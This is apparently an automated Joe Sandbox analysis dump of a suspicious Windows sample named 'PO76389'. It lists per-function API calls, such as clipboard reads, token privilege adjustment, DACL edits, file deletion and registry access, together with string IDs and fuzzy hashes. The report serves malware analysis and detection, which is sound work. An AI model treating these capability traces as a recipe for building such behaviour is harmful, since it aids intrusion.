                                                    • Instruction ID: 90a3bc080149fcfa8d2f5bf21ca07965a32df0141aefbfb2cd5f837378a24301
                                                    • Opcode Fuzzy Hash: 9ed413487e357585987da2afdb63d64177fdfee9bae8c8b31c11ecddba374191
                                                    • Instruction Fuzzy Hash: 5E315E71A40228BBEB216B71AC4AF7F7E7CEF55B50F104025FA05AA2D0C6B05951AEB0
                                                    APIs
                                                      • Part of subcall function 004B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004B31DA
                                                      • Part of subcall function 004F7B9F: __wsplitpath.LIBCMT ref: 004F7BBC
                                                      • Part of subcall function 004F7B9F: __wsplitpath.LIBCMT ref: 004F7BCF
                                                      • Part of subcall function 004F7C0C: GetFileAttributesW.KERNEL32(?,004F6A7B), ref: 004F7C0D
                                                    • _wcscat.LIBCMT ref: 004F6B9D
                                                    • _wcscat.LIBCMT ref: 004F6BBB
                                                    • __wsplitpath.LIBCMT ref: 004F6BE2
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004F6BF8
                                                    • _wcscpy.LIBCMT ref: 004F6C57
                                                    • _wcscat.LIBCMT ref: 004F6C6A
                                                    • _wcscat.LIBCMT ref: 004F6C7D
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 004F6CAB
                                                    • DeleteFileW.KERNEL32(?), ref: 004F6CBC
                                                    • MoveFileW.KERNEL32(?,?), ref: 004F6CDB
                                                    • MoveFileW.KERNEL32(?,?), ref: 004F6CEA
                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 004F6CFF
                                                    • DeleteFileW.KERNEL32(?), ref: 004F6D10
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004F6D37
                                                    • FindClose.KERNEL32(00000000), ref: 004F6D53
                                                    • FindClose.KERNEL32(00000000), ref: 004F6D61
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 1867810238-1173974218
                                                    • Opcode ID: 13d56b06fc3f4b08dfae43ec3c4269d9d9e3123cf4b8bbdbf955e296fab75521
                                                    • Instruction ID: 1b8e02fdcff1d17a2417751874dd4c9522fcef4e25e570b63460ab4c69dc3abb
                                                    • Opcode Fuzzy Hash: 13d56b06fc3f4b08dfae43ec3c4269d9d9e3123cf4b8bbdbf955e296fab75521
                                                    • Instruction Fuzzy Hash: CA515F7290015CAADB21DBA0DC54EEE77BCAF19304F0445DBE649E3201DB389B88CF65
                                                    APIs
                                                    • OpenClipboard.USER32(0054DBF0), ref: 005070C3
                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 005070D1
                                                    • GetClipboardData.USER32(0000000D), ref: 005070D9
                                                    • CloseClipboard.USER32 ref: 005070E5
                                                    • GlobalLock.KERNEL32(00000000), ref: 00507101
                                                    • CloseClipboard.USER32 ref: 0050710B
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00507120
                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0050712D
                                                    • GetClipboardData.USER32(00000001), ref: 00507135
                                                    • GlobalLock.KERNEL32(00000000), ref: 00507142
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00507176
                                                    • CloseClipboard.USER32 ref: 00507283
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                    • String ID:
                                                    • API String ID: 3222323430-0
                                                    • Opcode ID: 6924c3007ff3281dffeea46ba483468e62aecd3821fedf27d883f31ead9cbda9
                                                    • Instruction ID: 90af03d67c4a09e25e702cc7c5e4e49da1960232d57ab960b3fc6c8ff207182b
                                                    • Opcode Fuzzy Hash: 6924c3007ff3281dffeea46ba483468e62aecd3821fedf27d883f31ead9cbda9
                                                    • Instruction Fuzzy Hash: F251D6752082096BD300EF25DC86F6F7BB8BB98B00F00051EF556D62D1DB64E809DA72
                                                    APIs
                                                      • Part of subcall function 004EBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004EBF0F
                                                      • Part of subcall function 004EBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004EBF3C
                                                      • Part of subcall function 004EBEC3: GetLastError.KERNEL32 ref: 004EBF49
                                                    • _memset.LIBCMT ref: 004EBA34
                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004EBA86
                                                    • CloseHandle.KERNEL32(?), ref: 004EBA97
                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004EBAAE
                                                    • GetProcessWindowStation.USER32 ref: 004EBAC7
                                                    • SetProcessWindowStation.USER32(00000000), ref: 004EBAD1
                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004EBAEB
                                                      • Part of subcall function 004EB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004EB9EC), ref: 004EB8C5
                                                      • Part of subcall function 004EB8B0: CloseHandle.KERNEL32(?,?,004EB9EC), ref: 004EB8D7
                                                    Similarity
                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                    • String ID: $default$winsta0
                                                    • API String ID: 2063423040-1027155976
                                                    • Opcode ID: 2d5da6baf75d9c2ab55ee61fb0d4f3c50442491e58a578f2d0532828b7bce4ae
                                                    • Instruction ID: b1c88bd1c8a0bf1f2e91222c930b5faa19850e6bb42c80d0a775150da1186839
                                                    • Opcode Fuzzy Hash: 2d5da6baf75d9c2ab55ee61fb0d4f3c50442491e58a578f2d0532828b7bce4ae
                                                    • Instruction Fuzzy Hash: FA818071800249AFDF11DFA6DD45AEF7BB8FF08305F14416AF914A6260DB398E14EBA4
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004FFE03
                                                    • FindClose.KERNEL32(00000000), ref: 004FFE57
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004FFE7C
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004FFE93
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 004FFEBA
                                                    • __swprintf.LIBCMT ref: 004FFF06
                                                    • __swprintf.LIBCMT ref: 004FFF3F
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • __swprintf.LIBCMT ref: 004FFF93
                                                      • Part of subcall function 004D234B: __woutput_l.LIBCMT ref: 004D23A4
                                                    • __swprintf.LIBCMT ref: 004FFFE1
                                                    • __swprintf.LIBCMT ref: 00500030
                                                    • __swprintf.LIBCMT ref: 0050007F
                                                    • __swprintf.LIBCMT ref: 005000CE
                                                    Similarity
                                                    • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                    • API String ID: 108614129-2428617273
                                                    • Opcode ID: 73d22b3b78e28933b67ed273f47a5f5174c0399f8780aef40b7163948e52a9f5
                                                    • Instruction ID: 5ac51f21c32e05749123af6e24034ec66a991843ec85fb5871bfe5e022b72403
                                                    • Opcode Fuzzy Hash: 73d22b3b78e28933b67ed273f47a5f5174c0399f8780aef40b7163948e52a9f5
                                                    • Instruction Fuzzy Hash: 16A11071408344ABC350EFA5C895EAFB7EDBF98704F44091EF585C2191EB78DA09CB66
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00502065
                                                    • _wcscmp.LIBCMT ref: 0050207A
                                                    • _wcscmp.LIBCMT ref: 00502091
                                                    • GetFileAttributesW.KERNEL32(?), ref: 005020A3
                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 005020BD
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 005020D5
                                                    • FindClose.KERNEL32(00000000), ref: 005020E0
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 005020FC
                                                    • _wcscmp.LIBCMT ref: 00502123
                                                    • _wcscmp.LIBCMT ref: 0050213A
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0050214C
                                                    • SetCurrentDirectoryW.KERNEL32(00563A68), ref: 0050216A
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00502174
                                                    • FindClose.KERNEL32(00000000), ref: 00502181
                                                    • FindClose.KERNEL32(00000000), ref: 00502191
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                    • String ID: *.*
                                                    • API String ID: 1803514871-438819550
                                                    • Opcode ID: 6155f5801085814281c92988d69fade6612bdfa6c37892d2075e69138bfe7e39
                                                    • Instruction ID: 171b1847203f02c25120fb248f1d9bd8340370f64b8495d522d9fb3bb71898c1
                                                    • Opcode Fuzzy Hash: 6155f5801085814281c92988d69fade6612bdfa6c37892d2075e69138bfe7e39
                                                    • Instruction Fuzzy Hash: 2731A2316002196BCB20ABB4EC5CADE7BBCAF15324F104166F911E31D0DB74DA88DA74
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • DragQueryPoint.SHELL32(?,?), ref: 0051F14B
                                                      • Part of subcall function 0051D5EE: ClientToScreen.USER32(?,?), ref: 0051D617
                                                      • Part of subcall function 0051D5EE: GetWindowRect.USER32(?,?), ref: 0051D68D
                                                      • Part of subcall function 0051D5EE: PtInRect.USER32(?,?,0051EB2C), ref: 0051D69D
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0051F1B4
                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0051F1BF
                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0051F1E2
                                                    • _wcscat.LIBCMT ref: 0051F212
                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0051F229
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0051F242
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0051F259
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0051F27B
                                                    • DragFinish.SHELL32(?), ref: 0051F282
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0051F36D
                                                    Similarity
                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                    • API String ID: 2166380349-3440237614
                                                    • Opcode ID: dd59564d9e73b95c65c376d70f9ffc9bda5bff6346b579e8ac865bce523815a9
                                                    • Instruction ID: 06427f60a374b93390363bd45c740551d0bebf492699ce5f1ac53fa9394c8e65
                                                    • Opcode Fuzzy Hash: dd59564d9e73b95c65c376d70f9ffc9bda5bff6346b579e8ac865bce523815a9
                                                    • Instruction Fuzzy Hash: B9616A71008301AFD700EF64DC85E9BBBF8BF89714F000A2EF595932A1DB709A49DB66
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 005021C0
                                                    • _wcscmp.LIBCMT ref: 005021D5
                                                    • _wcscmp.LIBCMT ref: 005021EC
                                                      • Part of subcall function 004F7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004F7621
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0050221B
                                                    • FindClose.KERNEL32(00000000), ref: 00502226
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00502242
                                                    • _wcscmp.LIBCMT ref: 00502269
                                                    • _wcscmp.LIBCMT ref: 00502280
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00502292
                                                    • SetCurrentDirectoryW.KERNEL32(00563A68), ref: 005022B0
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 005022BA
                                                    • FindClose.KERNEL32(00000000), ref: 005022C7
                                                    • FindClose.KERNEL32(00000000), ref: 005022D7
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                    • String ID: *.*
                                                    • API String ID: 1824444939-438819550
                                                    • Opcode ID: b955e2c3d6d54723b234f32159998a2f825561339f4960868027c4a5b9077362
                                                    • Instruction ID: 4ae0049de6c5c34e2ac06164a43849b07abb8408e5704e9d07212e22ef4c7a6c
                                                    • Opcode Fuzzy Hash: b955e2c3d6d54723b234f32159998a2f825561339f4960868027c4a5b9077362
                                                    • Instruction Fuzzy Hash: ED31B23560121A6ACB20EBE4EC4CEDE7BBCAF55324F1405A6E814A21D0DB749E89DA64
                                                    Similarity
                                                    • API ID: _memmove_memset
                                                    • String ID: Q\E$[$\$\$\$]$^
                                                    • API String ID: 3555123492-286096704
                                                    • Opcode ID: 3d16cb89f5f63364d05aa0c0d4de51f2fbfa33be6ddd19584fff7febabc0fe0d
                                                    • Instruction ID: ed005b545b4f1ffa594f51b47d98938b88e0a7fbb861afc7b562bf855febcdc1
                                                    • Opcode Fuzzy Hash: 3d16cb89f5f63364d05aa0c0d4de51f2fbfa33be6ddd19584fff7febabc0fe0d
                                                    • Instruction Fuzzy Hash: 1F72B071D04219CBDF24CF98C8906EDBBB1FF44314F2581AAD855AB381D738AE81DB65
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0051ED0C
                                                    • GetFocus.USER32 ref: 0051ED1C
                                                    • GetDlgCtrlID.USER32(00000000), ref: 0051ED27
                                                    • _memset.LIBCMT ref: 0051EE52
                                                    • GetMenuItemInfoW.USER32 ref: 0051EE7D
                                                    • GetMenuItemCount.USER32(00000000), ref: 0051EE9D
                                                    • GetMenuItemID.USER32(?,00000000), ref: 0051EEB0
                                                    • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0051EEE4
                                                    • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0051EF2C
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0051EF64
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0051EF99
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                    • String ID: 0
                                                    • API String ID: 3616455698-4108050209
                                                    • Opcode ID: ee3f84785972f76a135eef15b704a4fbeb8de5f0ad7b52ecdc75a96473636e41
                                                    • Instruction ID: fc0c89bb79763194f44f03b9075f4fec71f3e5c450f0f9ab50927dedab0653a5
                                                    • Opcode Fuzzy Hash: ee3f84785972f76a135eef15b704a4fbeb8de5f0ad7b52ecdc75a96473636e41
                                                    • Instruction Fuzzy Hash: A6818D71108301AFEB10DF14D886AABBFE8FB88354F04492DFD9997291D730D985DBA2
                                                    APIs
                                                      • Part of subcall function 004EB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004EB903
                                                      • Part of subcall function 004EB8E7: GetLastError.KERNEL32(?,004EB3CB,?,?,?), ref: 004EB90D
                                                      • Part of subcall function 004EB8E7: GetProcessHeap.KERNEL32(00000008,?,?,004EB3CB,?,?,?), ref: 004EB91C
                                                      • Part of subcall function 004EB8E7: RtlAllocateHeap.NTDLL(00000000,?,004EB3CB), ref: 004EB923
                                                      • Part of subcall function 004EB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004EB93A
                                                      • Part of subcall function 004EB982: GetProcessHeap.KERNEL32(00000008,004EB3E1,00000000,00000000,?,004EB3E1,?), ref: 004EB98E
                                                      • Part of subcall function 004EB982: RtlAllocateHeap.NTDLL(00000000,?,004EB3E1), ref: 004EB995
                                                      • Part of subcall function 004EB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004EB3E1,?), ref: 004EB9A6
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004EB3FC
                                                    • _memset.LIBCMT ref: 004EB411
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004EB430
                                                    • GetLengthSid.ADVAPI32(?), ref: 004EB441
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 004EB47E
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004EB49A
                                                    • GetLengthSid.ADVAPI32(?), ref: 004EB4B7
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004EB4C6
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 004EB4CD
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004EB4EE
                                                    • CopySid.ADVAPI32(00000000), ref: 004EB4F5
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004EB526
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004EB54C
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004EB560
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                    • String ID:
                                                    • API String ID: 2347767575-0
                                                    • Opcode ID: 65bfcef0f7a0ed3ae48d5ce2520b4cee7561f8365fffb2e076a4f60028786a69
                                                    • Instruction ID: 8b549389e37f23c3cc4a22edb636603959bf5fa4ae6ee765b1f8b22b39ab6603
                                                    • Opcode Fuzzy Hash: 65bfcef0f7a0ed3ae48d5ce2520b4cee7561f8365fffb2e076a4f60028786a69
                                                    • Instruction Fuzzy Hash: A8515A71900249ABCF04DFA2DC48AEFBB79FF04745F04811AF911A63A1DB389A05DFA4
                                                    APIs
                                                      • Part of subcall function 004B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004B31DA
                                                      • Part of subcall function 004F7C0C: GetFileAttributesW.KERNEL32(?,004F6A7B), ref: 004F7C0D
                                                    • _wcscat.LIBCMT ref: 004F6E7E
                                                    • __wsplitpath.LIBCMT ref: 004F6E99
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004F6EAE
                                                    • _wcscpy.LIBCMT ref: 004F6EDD
                                                    • _wcscat.LIBCMT ref: 004F6EEF
                                                    • _wcscat.LIBCMT ref: 004F6F01
                                                    • DeleteFileW.KERNEL32(?), ref: 004F6F0E
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004F6F22
                                                    • FindClose.KERNEL32(00000000), ref: 004F6F3D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                    • String ID: \*.*
                                                    • API String ID: 2643075503-1173974218
                                                    • Opcode ID: ee945507a9565c7d54c2551b144d28dfaacd6a4c9dbe8c897b64a7df8d78fae4
                                                    • Instruction ID: a9480b40b2ff53407d09b405030a9c62f375ea2da9ca7b4f316bdd9d96c2a353
                                                    • Opcode Fuzzy Hash: ee945507a9565c7d54c2551b144d28dfaacd6a4c9dbe8c897b64a7df8d78fae4
                                                    • Instruction Fuzzy Hash: 0F21C5B2408348AAC310EBA4D8559EBBBEC9F59214F044E5FF5D4C3252EA38D64DC776
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                    • API String ID: 0-2893523900
                                                    • Opcode ID: 8e84dbbd1d0b22ee716732181b09ae14577c874c64712c1204f903254f96b906
                                                    • Instruction ID: 32adf74dce9c4d6c377b61d7eccbf0dcdb84ed04bbeab6bb3dd822ef06177ae3
                                                    • Opcode Fuzzy Hash: 8e84dbbd1d0b22ee716732181b09ae14577c874c64712c1204f903254f96b906
                                                    • Instruction Fuzzy Hash: 4A6281B1E002199BDF14DF99C8817EEBBB5BF48310F15816BE845EB281D7789E41CBA4
                                                    APIs
                                                      • Part of subcall function 00513AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00512AA6,?,?), ref: 00513B0E
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0051317F
                                                      • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                      • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0051321E
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 005132B6
                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 005134F5
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00513502
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1240663315-0
                                                    • Opcode ID: a04f14a089b60364445456188641c83859b620a956036b9414354e61aabc2b30
                                                    • Instruction ID: a21cc54dc9580a6236b317e3c15ecaa88f03c3daf5b86fe4e4bed89c41f79a21
                                                    • Opcode Fuzzy Hash: a04f14a089b60364445456188641c83859b620a956036b9414354e61aabc2b30
                                                    • Instruction Fuzzy Hash: 82E16B35204200AFDB14DF25C894E6ABBF9FF88724B04896EF44ADB261DB35ED45CB51
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                    • String ID:
                                                    • API String ID: 1737998785-0
                                                    • Opcode ID: aec96f673c3c12a4e0d1e8ed3b803afff563926f6afba5df65befdc3ecd2b7d6
                                                    • Instruction ID: 2c36732fa29d0fa9b5e308d2037fa2be436ce9630509fbf382438264bdcaeac8
                                                    • Opcode Fuzzy Hash: aec96f673c3c12a4e0d1e8ed3b803afff563926f6afba5df65befdc3ecd2b7d6
                                                    • Instruction Fuzzy Hash: DF21F635600115AFD7106F25EC1AB6E7BB8FF14710F00801AF9098B3A1DB78ED04EBA8
                                                    APIs
                                                      • Part of subcall function 004EA857: CLSIDFromProgID.COMBASE ref: 004EA874
                                                      • Part of subcall function 004EA857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 004EA88F
                                                      • Part of subcall function 004EA857: lstrcmpiW.KERNEL32(?,00000000), ref: 004EA89D
                                                      • Part of subcall function 004EA857: CoTaskMemFree.COMBASE(00000000), ref: 004EA8AD
                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0050C6AD
                                                    • _memset.LIBCMT ref: 0050C6BA
                                                    • _memset.LIBCMT ref: 0050C7D8
                                                    • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 0050C804
                                                    • CoTaskMemFree.COMBASE(?), ref: 0050C80F
                                                    Strings
